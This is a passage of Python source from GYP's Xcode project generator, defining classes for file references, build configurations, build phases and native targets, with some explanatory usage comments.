'css': 'text.css',
'cxx': 'sourcecode.cpp.cpp',
'dart': 'sourcecode',
'dylib': 'compiled.mach-o.dylib',
'framework': 'wrapper.framework',
'gyp': 'sourcecode',
'gypi': 'sourcecode',
'h': 'sourcecode.c.h',
'hxx': 'sourcecode.cpp.h',
'icns': 'image.icns',
'java': 'sourcecode.java',
'js': 'sourcecode.javascript',
'kext': 'wrapper.kext',
'm': 'sourcecode.c.objc',
'mm': 'sourcecode.cpp.objcpp',
'nib': 'wrapper.nib',
'o': 'compiled.mach-o.objfile',
'pdf': 'image.pdf',
'pl': 'text.script.perl',
'plist': 'text.plist.xml',
'pm': 'text.script.perl',
'png': 'image.png',
'py': 'text.script.python',
'r': 'sourcecode.rez',
'rez': 'sourcecode.rez',
's': 'sourcecode.asm',
'storyboard': 'file.storyboard',
'strings': 'text.plist.strings',
'swift': 'sourcecode.swift',
'ttf': 'file',
'xcassets': 'folder.assetcatalog',
'xcconfig': 'text.xcconfig',
'xcdatamodel': 'wrapper.xcdatamodel',
'xcdatamodeld':'wrapper.xcdatamodeld',
'xib': 'file.xib',
'y': 'sourcecode.yacc',
}
prop_map = {
'dart': 'explicitFileType',
'gyp': 'explicitFileType',
'gypi': 'explicitFileType',
}
if is_dir:
file_type = 'folder'
prop_name = 'lastKnownFileType'
else:
basename = posixpath.basename(self._properties['path'])
(root, ext) = posixpath.splitext(basename)
# Check the map using a lowercase extension.
# TODO(mark): Maybe it should try with the original case first and fall
# back to lowercase, in case there are any instances where case
# matters. There currently aren't.
if ext != '':
ext = ext[1:].lower()
# TODO(mark): "text" is the default value, but "file" is appropriate
# for unrecognized files not containing text. Xcode seems to choose
# based on content.
file_type = extension_map.get(ext, 'text')
prop_name = prop_map.get(ext, 'lastKnownFileType')
self._properties[prop_name] = file_type
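# Illustrative sketch (editor's addition): the extension map above drives the
# file-type annotation stored on a new PBXFileReference.
#
#   ref = PBXFileReference({'path': 'src/widget.mm'})
#   # ref._properties['lastKnownFileType'] == 'sourcecode.cpp.objcpp'
#   gyp_ref = PBXFileReference({'path': 'widget.gyp'})
#   # .gyp files get 'explicitFileType' instead, per prop_map above.
#   dir_ref = PBXFileReference({'path': 'assets/'})
#   # A trailing slash marks a folder reference: lastKnownFileType == 'folder'.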
class PBXVariantGroup(PBXGroup, XCFileLikeElement):
"""PBXVariantGroup is used by Xcode to represent localizations."""
# No additions to the schema relative to PBXGroup.
pass
# PBXReferenceProxy is also an XCFileLikeElement subclass. It is defined below
# because it uses PBXContainerItemProxy, defined below.
class XCBuildConfiguration(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'baseConfigurationReference': [0, PBXFileReference, 0, 0],
'buildSettings': [0, dict, 0, 1, {}],
'name': [0, str, 0, 1],
})
def HasBuildSetting(self, key):
return key in self._properties['buildSettings']
def GetBuildSetting(self, key):
return self._properties['buildSettings'][key]
def SetBuildSetting(self, key, value):
# TODO(mark): If a list, copy?
self._properties['buildSettings'][key] = value
def AppendBuildSetting(self, key, value):
if not key in self._properties['buildSettings']:
self._properties['buildSettings'][key] = []
self._properties['buildSettings'][key].append(value)
def DelBuildSetting(self, key):
if key in self._properties['buildSettings']:
del self._properties['buildSettings'][key]
def SetBaseConfiguration(self, value):
self._properties['baseConfigurationReference'] = value
class XCConfigurationList(XCObject):
# _configs is the default list of configurations.
_configs = [ XCBuildConfiguration({'name': 'Debug'}),
XCBuildConfiguration({'name': 'Release'}) ]
_schema = XCObject._schema.copy()
_schema.update({
'buildConfigurations': [1, XCBuildConfiguration, 1, 1, _configs],
'defaultConfigurationIsVisible': [0, int, 0, 1, 1],
'defaultConfigurationName': [0, str, 0, 1, 'Release'],
})
def Name(self):
return 'Build configuration list for ' + \
self.parent.__class__.__name__ + ' "' + self.parent.Name() + '"'
def ConfigurationNamed(self, name):
"""Convenience accessor to obtain an XCBuildConfiguration by name."""
for configuration in self._properties['buildConfigurations']:
if configuration._properties['name'] == name:
return configuration
raise KeyError(name)
def DefaultConfiguration(self):
"""Convenience accessor to obtain the default XCBuildConfiguration."""
return self.ConfigurationNamed(self._properties['defaultConfigurationName'])
def HasBuildSetting(self, key):
"""Determines the state of a build setting in all XCBuildConfiguration
child objects.
If all child objects have key in their build settings, and the value is the
same in all child objects, returns 1.
If no child objects have the key in their build settings, returns 0.
If some, but not all, child objects have the key in their build settings,
or if any children have different values for the key, returns -1.
"""
has = None
value = None
for configuration in self._properties['buildConfigurations']:
configuration_has = configuration.HasBuildSetting(key)
if has is None:
has = configuration_has
elif has != configuration_has:
return -1
if configuration_has:
configuration_value = configuration.GetBuildSetting(key)
if value is None:
value = configuration_value
elif value != configuration_value:
return -1
if not has:
return 0
return 1
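  # Illustrative sketch (editor's addition): the tri-state return value.
  #
  #   debug = XCBuildConfiguration(
  #       {'name': 'Debug', 'buildSettings': {'GCC_OPTIMIZATION_LEVEL': '0'}})
  #   release = XCBuildConfiguration({'name': 'Release'})
  #   config_list = XCConfigurationList(
  #       {'buildConfigurations': [debug, release]})
  #   config_list.HasBuildSetting('GCC_OPTIMIZATION_LEVEL')  # -1: some, not all
  #   config_list.HasBuildSetting('OTHER_CFLAGS')             # 0: none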
def GetBuildSetting(self, key):
"""Gets the build setting for key.
All child XCConfiguration objects must have the same value set for the
setting, or a ValueError will be raised.
"""
# TODO(mark): This is wrong for build settings that are lists. The list
# contents should be compared (and a list copy returned?)
value = None
for configuration in self._properties['buildConfigurations']:
configuration_value = configuration.GetBuildSetting(key)
if value is None:
value = configuration_value
else:
if value != configuration_value:
raise ValueError('Variant values for ' + key)
return value
def SetBuildSetting(self, key, value):
"""Sets the build setting for key to value in all child
XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.SetBuildSetting(key, value)
def AppendBuildSetting(self, key, value):
"""Appends value to the build setting for key, which is treated as a list,
in all child XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.AppendBuildSetting(key, value)
def DelBuildSetting(self, key):
"""Deletes the build setting key from all child XCBuildConfiguration
objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.DelBuildSetting(key)
def SetBaseConfiguration(self, value):
"""Sets the build configuration in all child XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.SetBaseConfiguration(value)
class PBXBuildFile(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'fileRef': [0, XCFileLikeElement, 0, 1],
'settings': [0, str, 0, 0], # hack, it's a dict
})
# Weird output rules for PBXBuildFile.
_should_print_single_line = True
_encode_transforms = XCObject._alternate_encode_transforms
def Name(self):
# Example: "main.cc in Sources"
return self._properties['fileRef'].Name() + ' in ' + self.parent.Name()
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# It is not sufficient to just rely on Name() to get the
# XCFileLikeElement's name, because that is not a complete pathname.
# PathHashables returns hashables unique enough that no two
# PBXBuildFiles should wind up with the same set of hashables, unless
# someone adds the same file multiple times to the same target. That
# would be considered invalid anyway.
hashables.extend(self._properties['fileRef'].PathHashables())
return hashables
class XCBuildPhase(XCObject):
"""Abstract base for build phase classes. Not represented in a project
file.
Attributes:
_files_by_path: A dict mapping each path of a child in the files list by
path (keys) to the corresponding PBXBuildFile children (values).
_files_by_xcfilelikeelement: A dict mapping each XCFileLikeElement (keys)
to the corresponding PBXBuildFile children (values).
"""
# TODO(mark): Some build phase types, like PBXShellScriptBuildPhase, don't
# actually have a "files" list. XCBuildPhase should not have "files" but
# another abstract subclass of it should provide this, and concrete build
# phase types that do have "files" lists should be derived from that new
# abstract subclass. XCBuildPhase should only provide buildActionMask and
# runOnlyForDeploymentPostprocessing, and not files or the various
# file-related methods and attributes.
_schema = XCObject._schema.copy()
_schema.update({
'buildActionMask': [0, int, 0, 1, 0x7fffffff],
'files': [1, PBXBuildFile, 1, 1, []],
'runOnlyForDeploymentPostprocessing': [0, int, 0, 1, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCObject.__init__(self, properties, id, parent)
self._files_by_path = {}
self._files_by_xcfilelikeelement = {}
for pbxbuildfile in self._properties.get('files', []):
self._AddBuildFileToDicts(pbxbuildfile)
def FileGroup(self, path):
# Subclasses must override this by returning a two-element tuple. The
# first item in the tuple should be the PBXGroup to which "path" should be
# added, either as a child or deeper descendant. The second item should
# be a boolean indicating whether files should be added into hierarchical
# groups or one single flat group.
raise NotImplementedError(
self.__class__.__name__ + ' must implement FileGroup')
def _AddPathToDict(self, pbxbuildfile, path):
"""Adds path to the dict tracking paths belonging to this build phase.
If the path is already a member of this build phase, raises an exception.
"""
if path in self._files_by_path:
raise ValueError('Found multiple build files with path ' + path)
self._files_by_path[path] = pbxbuildfile
def _AddBuildFileToDicts(self, pbxbuildfile, path=None):
"""Maintains the _files_by_path and _files_by_xcfilelikeelement dicts.
If path is specified, then it is the path that is being added to the
phase, and pbxbuildfile must contain either a PBXFileReference directly
referencing that path, or it must contain a PBXVariantGroup that itself
contains a PBXFileReference referencing the path.
If path is not specified, either the PBXFileReference's path or the paths
of all children of the PBXVariantGroup are taken as being added to the
phase.
If the path is already present in the phase, raises an exception.
If the PBXFileReference or PBXVariantGroup referenced by pbxbuildfile
are already present in the phase, referenced by a different PBXBuildFile
object, raises an exception. This does not raise an exception when
a PBXFileReference or PBXVariantGroup reappear and are referenced by the
same PBXBuildFile that has already introduced them, because in the case
of PBXVariantGroup objects, they may correspond to multiple paths that are
not all added simultaneously. When this situation occurs, the path needs
to be added to _files_by_path, but nothing needs to change in
_files_by_xcfilelikeelement, and the caller should have avoided adding
the PBXBuildFile if it is already present in the list of children.
"""
xcfilelikeelement = pbxbuildfile._properties['fileRef']
paths = []
if path != None:
# It's best when the caller provides the path.
if isinstance(xcfilelikeelement, PBXVariantGroup):
paths.append(path)
else:
# If the caller didn't provide a path, there can be either multiple
# paths (PBXVariantGroup) or one.
if isinstance(xcfilelikeelement, PBXVariantGroup):
for variant in xcfilelikeelement._properties['children']:
paths.append(variant.FullPath())
else:
paths.append(xcfilelikeelement.FullPath())
# Add the paths first, because if something's going to raise, the
# messages provided by _AddPathToDict are more useful owing to its
# having access to a real pathname and not just an object's Name().
for a_path in paths:
self._AddPathToDict(pbxbuildfile, a_path)
# If another PBXBuildFile references this XCFileLikeElement, there's a
# problem.
if xcfilelikeelement in self._files_by_xcfilelikeelement and \
self._files_by_xcfilelikeelement[xcfilelikeelement] != pbxbuildfile:
raise ValueError('Found multiple build files for ' + \
xcfilelikeelement.Name())
self._files_by_xcfilelikeelement[xcfilelikeelement] = pbxbuildfile
def AppendBuildFile(self, pbxbuildfile, path=None):
# Callers should use this instead of calling
# AppendProperty('files', pbxbuildfile) directly because this function
# maintains the object's dicts. Better yet, callers can just call AddFile
# with a pathname and not worry about building their own PBXBuildFile
# objects.
self.AppendProperty('files', pbxbuildfile)
self._AddBuildFileToDicts(pbxbuildfile, path)
def AddFile(self, path, settings=None):
(file_group, hierarchical) = self.FileGroup(path)
file_ref = file_group.AddOrGetFileByPath(path, hierarchical)
if file_ref in self._files_by_xcfilelikeelement and \
isinstance(file_ref, PBXVariantGroup):
# There's already a PBXBuildFile in this phase corresponding to the
# PBXVariantGroup. path just provides a new variant that belongs to
# the group. Add the path to the dict.
pbxbuildfile = self._files_by_xcfilelikeelement[file_ref]
self._AddBuildFileToDicts(pbxbuildfile, path)
else:
# Add a new PBXBuildFile to get file_ref into the phase.
if settings is None:
pbxbuildfile = PBXBuildFile({'fileRef': file_ref})
else:
pbxbuildfile = PBXBuildFile({'fileRef': file_ref, 'settings': settings})
self.AppendBuildFile(pbxbuildfile, path)
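  # Illustrative sketch (editor's addition): callers normally hand AddFile a
  # plain path and let the phase build its own PBXBuildFile.  Assuming
  # sources_phase is a PBXSourcesBuildPhase attached to a target in a project:
  #
  #   sources_phase.AddFile('src/main.cc')
  #   sources_phase.AddFile('src/English.lproj/Localizable.strings')
  #   sources_phase.AddFile('src/French.lproj/Localizable.strings')
  #   # Both .strings variants end up sharing one PBXBuildFile that points at
  #   # the PBXVariantGroup; only the path bookkeeping is updated the second
  #   # time.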
class PBXHeadersBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Headers'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXResourcesBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Resources'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXSourcesBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Sources'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXFrameworksBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Frameworks'
def FileGroup(self, path):
(root, ext) = posixpath.splitext(path)
if ext != '':
ext = ext[1:].lower()
if ext == 'o':
# .o files are added to Xcode Frameworks phases, but conceptually aren't
# frameworks, they're more like sources or intermediates. Redirect them
# to show up in one of those other groups.
return self.PBXProjectAncestor().RootGroupForPath(path)
else:
return (self.PBXProjectAncestor().FrameworksGroup(), False)
class PBXShellScriptBuildPhase(XCBuildPhase):
_schema = XCBuildPhase._schema.copy()
_schema.update({
'inputPaths': [1, str, 0, 1, []],
'name': [0, str, 0, 0],
'outputPaths': [1, str, 0, 1, []],
'shellPath': [0, str, 0, 1, '/bin/sh'],
'shellScript': [0, str, 0, 1],
'showEnvVarsInLog': [0, int, 0, 0],
})
def Name(self):
if 'name' in self._properties:
return self._properties['name']
return 'ShellScript'
class PBXCopyFilesBuildPhase(XCBuildPhase):
_schema = XCBuildPhase._schema.copy()
_schema.update({
'dstPath': [0, str, 0, 1],
'dstSubfolderSpec': [0, int, 0, 1],
'name': [0, str, 0, 0],
})
# path_tree_re matches "$(DIR)/path" or just "$(DIR)". Match group 1 is
# "DIR", match group 3 is "path" or None.
path_tree_re = re.compile('^\\$\\((.*)\\)(/(.*)|)$')
# path_tree_to_subfolder maps names of Xcode variables to the associated
# dstSubfolderSpec property value used in a PBXCopyFilesBuildPhase object.
path_tree_to_subfolder = {
'BUILT_FRAMEWORKS_DIR': 10, # Frameworks Directory
'BUILT_PRODUCTS_DIR': 16, # Products Directory
# Other types that can be chosen via the Xcode UI.
# TODO(mark): Map Xcode variable names to these.
# : 1, # Wrapper
# : 6, # Executables: 6
# : 7, # Resources
# : 15, # Java Resources
# : 11, # Shared Frameworks
# : 12, # Shared Support
# : 13, # PlugIns
}
def Name(self):
if 'name' in self._properties:
return self._properties['name']
return 'CopyFiles'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
def SetDestination(self, path):
"""Set the dstSubfolderSpec and dstPath properties from path.
path may be specified in the same notation used for XCHierarchicalElements,
specifically, "$(DIR)/path".
"""
path_tree_match = self.path_tree_re.search(path)
if path_tree_match:
# Everything else needs to be relative to an Xcode variable.
path_tree = path_tree_match.group(1)
relative_path = path_tree_match.group(3)
if path_tree in self.path_tree_to_subfolder:
subfolder = self.path_tree_to_subfolder[path_tree]
if relative_path is None:
relative_path = ''
else:
# The path starts with an unrecognized Xcode variable
# name like $(SRCROOT). Xcode will still handle this
# as an "absolute path" that starts with the variable.
subfolder = 0
relative_path = path
elif path.startswith('/'):
# Special case. Absolute paths are in dstSubfolderSpec 0.
subfolder = 0
relative_path = path[1:]
else:
raise ValueError('Can\'t use path %s in a %s' % \
(path, self.__class__.__name__))
self._properties['dstPath'] = relative_path
self._properties['dstSubfolderSpec'] = subfolder
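  # Illustrative sketch (editor's addition): how SetDestination maps paths to
  # (dstSubfolderSpec, dstPath) pairs.
  #
  #   phase = PBXCopyFilesBuildPhase({'name': 'Copy Frameworks'})
  #   phase.SetDestination('$(BUILT_PRODUCTS_DIR)/plugins')
  #   # dstSubfolderSpec == 16, dstPath == 'plugins'
  #   phase.SetDestination('/usr/local/lib')
  #   # dstSubfolderSpec == 0, dstPath == 'usr/local/lib'
  #   phase.SetDestination('$(SRCROOT)/out')
  #   # Unrecognized variable: dstSubfolderSpec == 0 and dstPath keeps the
  #   # variable reference as an "absolute" path.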
class PBXBuildRule(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'compilerSpec': [0, str, 0, 1],
'filePatterns': [0, str, 0, 0],
'fileType': [0, str, 0, 1],
'isEditable': [0, int, 0, 1, 1],
'outputFiles': [1, str, 0, 1, []],
'script': [0, str, 0, 0],
})
def Name(self):
# Not very inspired, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.append(self._properties['fileType'])
if 'filePatterns' in self._properties:
hashables.append(self._properties['filePatterns'])
return hashables
class PBXContainerItemProxy(XCObject):
# When referencing an item in this project file, containerPortal is the
# PBXProject root object of this project file. When referencing an item in
# another project file, containerPortal is a PBXFileReference identifying
# the other project file.
#
# When serving as a proxy to an XCTarget (in this project file or another),
# proxyType is 1. When serving as a proxy to a PBXFileReference (in another
# project file), proxyType is 2. Type 2 is used for references to the
  # products of the other project file's targets.
#
# Xcode is weird about remoteGlobalIDString. Usually, it's printed without
# a comment, indicating that it's tracked internally simply as a string, but
# sometimes it's printed with a comment (usually when the object is initially
# created), indicating that it's tracked as a project file object at least
# sometimes. This module always tracks it as an object, but contains a hack
# to prevent it from printing the comment in the project file output. See
# _XCKVPrint.
_schema = XCObject._schema.copy()
_schema.update({
'containerPortal': [0, XCContainerPortal, 0, 1],
'proxyType': [0, int, 0, 1],
'remoteGlobalIDString': [0, XCRemoteObject, 0, 1],
'remoteInfo': [0, str, 0, 1],
})
def __repr__(self):
props = self._properties
name = '%s.gyp:%s' % (props['containerPortal'].Name(), props['remoteInfo'])
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Name(self):
# Admittedly not the best name, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.extend(self._properties['containerPortal'].Hashables())
hashables.extend(self._properties['remoteGlobalIDString'].Hashables())
return hashables
class PBXTargetDependency(XCObject):
# The "target" property accepts an XCTarget object, and obviously not
# NoneType. But XCTarget is defined below, so it can't be put into the
# schema yet. The definition of PBXTargetDependency can't be moved below
# XCTarget because XCTarget's own schema references PBXTargetDependency.
# Python doesn't deal well with this circular relationship, and doesn't have
# a real way to do forward declarations. To work around, the type of
# the "target" property is reset below, after XCTarget is defined.
#
# At least one of "name" and "target" is required.
_schema = XCObject._schema.copy()
_schema.update({
'name': [0, str, 0, 0],
'target': [0, None.__class__, 0, 0],
'targetProxy': [0, PBXContainerItemProxy, 1, 1],
})
def __repr__(self):
name = self._properties.get('name') or self._properties['target'].Name()
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Name(self):
# Admittedly not the best name, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.extend(self._properties['targetProxy'].Hashables())
return hashables
class PBXReferenceProxy(XCFileLikeElement):
_schema = XCFileLikeElement._schema.copy()
_schema.update({
'fileType': [0, str, 0, 1],
'path': [0, str, 0, 1],
'remoteRef': [0, PBXContainerItemProxy, 1, 1],
})
class XCTarget(XCRemoteObject):
# An XCTarget is really just an XCObject, the XCRemoteObject thing is just
# to allow PBXProject to be used in the remoteGlobalIDString property of
# PBXContainerItemProxy.
#
# Setting a "name" property at instantiation may also affect "productName",
# which may in turn affect the "PRODUCT_NAME" build setting in children of
# "buildConfigurationList". See __init__ below.
_schema = XCRemoteObject._schema.copy()
_schema.update({
'buildConfigurationList': [0, XCConfigurationList, 1, 1,
XCConfigurationList()],
'buildPhases': [1, XCBuildPhase, 1, 1, []],
'dependencies': [1, PBXTargetDependency, 1, 1, []],
'name': [0, str, 0, 1],
'productName': [0, str, 0, 1],
})
def __init__(self, properties=None, id=None, parent=None,
force_outdir=None, force_prefix=None, force_extension=None):
# super
XCRemoteObject.__init__(self, properties, id, parent)
# Set up additional defaults not expressed in the schema. If a "name"
# property was supplied, set "productName" if it is not present. Also set
# the "PRODUCT_NAME" build setting in each configuration, but only if
# the setting is not present in any build configuration.
if 'name' in self._properties:
if not 'productName' in self._properties:
self.SetProperty('productName', self._properties['name'])
if 'productName' in self._properties:
if 'buildConfigurationList' in self._properties:
configs = self._properties['buildConfigurationList']
if configs.HasBuildSetting('PRODUCT_NAME') == 0:
configs.SetBuildSetting('PRODUCT_NAME',
self._properties['productName'])
def AddDependency(self, other):
pbxproject = self.PBXProjectAncestor()
other_pbxproject = other.PBXProjectAncestor()
if pbxproject == other_pbxproject:
# Add a dependency to another target in the same project file.
container = PBXContainerItemProxy({'containerPortal': pbxproject,
'proxyType': 1,
'remoteGlobalIDString': other,
'remoteInfo': other.Name()})
dependency = PBXTargetDependency({'target': other,
'targetProxy': container})
self.AppendProperty('dependencies', dependency)
else:
# Add a dependency to a target in a different project file.
other_project_ref = \
pbxproject.AddOrGetProjectReference(other_pbxproject)[1]
container = PBXContainerItemProxy({
'containerPortal': other_project_ref,
'proxyType': 1,
'remoteGlobalIDString': other,
'remoteInfo': other.Name(),
})
dependency = PBXTargetDependency({'name': other.Name(),
'targetProxy': container})
self.AppendProperty('dependencies', dependency)
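  # Illustrative sketch (editor's addition): wiring an in-project dependency.
  # Assuming app_target and lib_target are XCTargets in the same PBXProject:
  #
  #   app_target.AddDependency(lib_target)
  #   # A PBXContainerItemProxy (proxyType 1) and a PBXTargetDependency are
  #   # appended to app_target's 'dependencies' list; the cross-project branch
  #   # above would route through AddOrGetProjectReference instead.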
# Proxy all of these through to the build configuration list.
def ConfigurationNamed(self, name):
return self._properties['buildConfigurationList'].ConfigurationNamed(name)
def DefaultConfiguration(self):
return self._properties['buildConfigurationList'].DefaultConfiguration()
def HasBuildSetting(self, key):
return self._properties['buildConfigurationList'].HasBuildSetting(key)
def GetBuildSetting(self, key):
return self._properties['buildConfigurationList'].GetBuildSetting(key)
def SetBuildSetting(self, key, value):
return self._properties['buildConfigurationList'].SetBuildSetting(key, \
value)
def AppendBuildSetting(self, key, value):
return self._properties['buildConfigurationList'].AppendBuildSetting(key, \
value)
def DelBuildSetting(self, key):
return self._properties['buildConfigurationList'].DelBuildSetting(key)
# Redefine the type of the "target" property. See PBXTargetDependency._schema
# above.
PBXTargetDependency._schema['target'][1] = XCTarget
class PBXNativeTarget(XCTarget):
# buildPhases is overridden in the schema to be able to set defaults.
#
# NOTE: Contrary to most objects, it is advisable to set parent when
# constructing PBXNativeTarget. A parent of an XCTarget must be a PBXProject
# object. A parent reference is required for a PBXNativeTarget during
# construction to be able to set up the target defaults for productReference,
# because a PBXBuildFile object must be created for the target and it must
# be added to the PBXProject's mainGroup hierarchy.
_schema = XCTarget._schema.copy()
_schema.update({
'buildPhases': [1, XCBuildPhase, 1, 1,
[PBXSourcesBuildPhase(), PBXFrameworksBuildPhase()]],
'buildRules': [1, PBXBuildRule, 1, 1, []],
'productReference': [0, PBXFileReference, 0, 1],
'productType': [0, str, 0, 1],
})
# Mapping from Xcode product-types to settings. The settings are:
# filetype : used for explicitFileType in the project file
# prefix : the prefix for the file name
# suffix : the suffix for the file name
_product_filetypes = {
'com.apple.product-type.application': ['wrapper.application',
'', '.app'],
'com.apple.product-type.application.watchapp': ['wrapper.application',
'', '.app'],
'com.apple.product-type.watchkit-extension': ['wrapper.app-extension',
'', '.appex'],
'com.apple.product-type.app-extension': ['wrapper.app-extension',
'', '.appex'],
'com.apple.product-type.bundle': ['wrapper.cfbundle',
'', '.bundle'],
'com.apple.product-type.framework': ['wrapper.framework',
'', '.framework'],
'com.apple.product-type.library.dynamic': ['compiled.mach-o.dylib',
'lib', '.dylib'],
'com.apple.product-type.library.static': ['archive.ar',
'lib', '.a'],
'com.apple.product-type.tool': ['compiled.mach-o.executable',
'', ''],
'com.apple.product-type.bundle.unit-test': ['wrapper.cfbundle',
'', '.xctest'],
'com.googlecode.gyp.xcode.bundle': ['compiled.mach-o.dylib',
'', '.so'],
'com.apple.product-type.kernel-extension': ['wrapper.kext',
'', '.kext'],
}
def __init__(self, properties=None, id=None, parent=None,
force_outdir=None, force_prefix=None, force_extension=None):
# super
XCTarget.__init__(self, properties, id, parent)
if 'productName' in self._properties and \
'productType' in self._properties and \
not 'productReference' in self._properties and \
self._properties['productType'] in self._product_filetypes:
products_group = None
pbxproject = self.PBXProjectAncestor()
if pbxproject != None:
products_group = pbxproject.ProductsGroup()
if products_group != None:
(filetype, prefix, suffix) = \
self._product_filetypes[self._properties['productType']]
# Xcode does not have a distinct type for loadable modules that are
# pure BSD targets (not in a bundle wrapper). GYP allows such modules
# to be specified by setting a target type to loadable_module without
# having mac_bundle set. These are mapped to the pseudo-product type
# com.googlecode.gyp.xcode.bundle.
#
# By picking up this special type and converting it to a dynamic
# library (com.apple.product-type.library.dynamic) with fix-ups,
# single-file loadable modules can be produced.
#
# MACH_O_TYPE is changed to mh_bundle to produce the proper file type
# (as opposed to mh_dylib). In order for linking to succeed,
# DYLIB_CURRENT_VERSION and DYLIB_COMPATIBILITY_VERSION must be
# cleared. They are meaningless for type mh_bundle.
#
# Finally, the .so extension is forcibly applied over the default
# (.dylib), unless another forced extension is already selected.
# .dylib is plainly wrong, and .bundle is used by loadable_modules in
# bundle wrappers (com.apple.product-type.bundle). .so seems an odd
# choice because it's used as the extension on many other systems that
# don't distinguish between linkable shared libraries and non-linkable
# loadable modules, but there's precedent: Python loadable modules on
# Mac OS X use an .so extension.
if self._properties['productType'] == 'com.googlecode.gyp.xcode.bundle':
self._properties['productType'] = \
'com.apple.product-type.library.dynamic'
self.SetBuildSetting('MACH_O_TYPE', 'mh_bundle')
self.SetBuildSetting('DYLIB_CURRENT_VERSION', '')
self.SetBuildSetting('DYLIB_COMPATIBILITY_VERSION', '')
if force_extension is None:
force_extension = suffix[1:]
if self._properties['productType'] == \
'com.apple.product-type-bundle.unit.test':
if force_extension is None:
force_extension = suffix[1:]
if force_extension is not None:
# If it's a wrapper (bundle), set WRAPPER_EXTENSION.
# Extension override.
suffix = '.' + force_extension
if filetype.startswith('wrapper.'):
self.SetBuildSetting('WRAPPER_EXTENSION', force_extension)
else:
self.SetBuildSetting('EXECUTABLE_EXTENSION', force_extension)
if filetype.startswith('compiled.mach-o.executable'):
product_name = self._properties['productName']
product_name += suffix
suffix = ''
self.SetProperty('productName', product_name)
self.SetBuildSetting('PRODUCT_NAME', product_name)
# Xcode handles most prefixes based on the target type, however there
# are exceptions. If a "BSD Dynamic Library" target is added in the
# Xcode UI, Xcode sets EXECUTABLE_PREFIX. This check duplicates that
# behavior.
if force_prefix is not None:
prefix = force_prefix
if filetype.startswith('wrapper.'):
self.SetBuildSetting('WRAPPER_PREFIX', prefix)
else:
self.SetBuildSetting('EXECUTABLE_PREFIX', prefix)
if force_outdir is not None:
self.SetBuildSetting('TARGET_BUILD_DIR', force_outdir)
# TODO(tvl): Remove the below hack.
# http://code.google.com/p/gyp/issues/detail?id=122
# Some targets include the prefix in the target_name. These targets
# really should just add a product_name setting that doesn't include
# the prefix. For example:
# target_name = 'libevent', product_name = 'event'
# This check cleans up for them.
product_name = self._properties['productName']
prefix_len = len(prefix)
if prefix_len and (product_name[:prefix_len] == prefix):
product_name = product_name[prefix_len:]
self.SetProperty('productName', product_name)
self.SetBuildSetting('PRODUCT_NAME', product_name)
ref_props = {
'explicitFileType': filetype,
'includeInIndex': 0,
'path': prefix + product_name + suffix,
'sourceTree': 'BUILT_PRODUCTS_DIR',
}
file_ref = PBXFileReference(ref_props)
products_group.AppendChild(file_ref)
self.SetProperty('productReference', file_ref)
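  # Illustrative sketch (editor's addition): product naming for a static
  # library target.  Assuming pbxproject is a PBXProject instance:
  #
  #   target = PBXNativeTarget(
  #       {'name': 'base',
  #        'productType': 'com.apple.product-type.library.static'},
  #       parent=pbxproject)
  #   # productName defaults to 'base', and the generated productReference in
  #   # the Products group gets the path 'libbase.a' ('lib' prefix, '.a'
  #   # suffix from _product_filetypes).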
def GetBuildPhaseByType(self, type):
if not 'buildPhases' in self._properties:
return None
the_phase = None
for phase in self._properties['buildPhases']:
if isinstance(phase, type):
        # Some phases may be present in multiples in a well-formed project file,
        # but phases like PBXSourcesBuildPhase may only be present singly, and
        # this function is intended as an aid to the singular accessors such as
        # SourcesPhase and HeadersPhase.  Loop over the entire list of phases
        # and assert if more than one of the desired type is found.
assert the_phase is None
the_phase = phase
return the_phase
def HeadersPhase(self):
headers_phase = self.GetBuildPhaseByType(PBXHeadersBuildPhase)
if headers_phase is None:
headers_phase = PBXHeadersBuildPhase()
# The headers phase should come before the resources, sources, and
# frameworks phases, if any.
insert_at = len(self._properties['buildPhases'])
for index in xrange(0, len(self._properties['buildPhases'])):
phase = self._properties['buildPhases'][index]
if isinstance(phase, PBXResourcesBuildPhase) or \
isinstance(phase, PBXSourcesBuildPhase) or \
isinstance(phase, PBXFrameworksBuildPhase):
insert_at = index
break
self._properties['buildPhases'].insert(insert_at, headers_phase)
headers_phase.parent = self
return headers_phase
def ResourcesPhase(self):
resources_phase = self.GetBuildPhaseByType(PBXResourcesBuildPhase)
if resources_phase is None:
resources_phase = PBXResourcesBuildPhase()
# The resources phase should come before the sources and frameworks
# phases, if any.
insert_at = len(self._properties['buildPhases'])
for index in xrange(0, len(self._properties['buildPhases'])):
phase = self._properties['buildPhases'][index]
if isinstance(phase, PBXSourcesBuildPhase) or \
isinstance(phase, PBXFrameworksBuildPhase):
insert_at = index
break
self._properties['buildPhases'].insert(insert_at, resources_phase)
resources_phase.parent = self
return resources_phase
def SourcesPhase(self):
sources_phase = self.GetBuildPhaseByType(PBXSourcesBuildPhase)
if sources_phase is None:
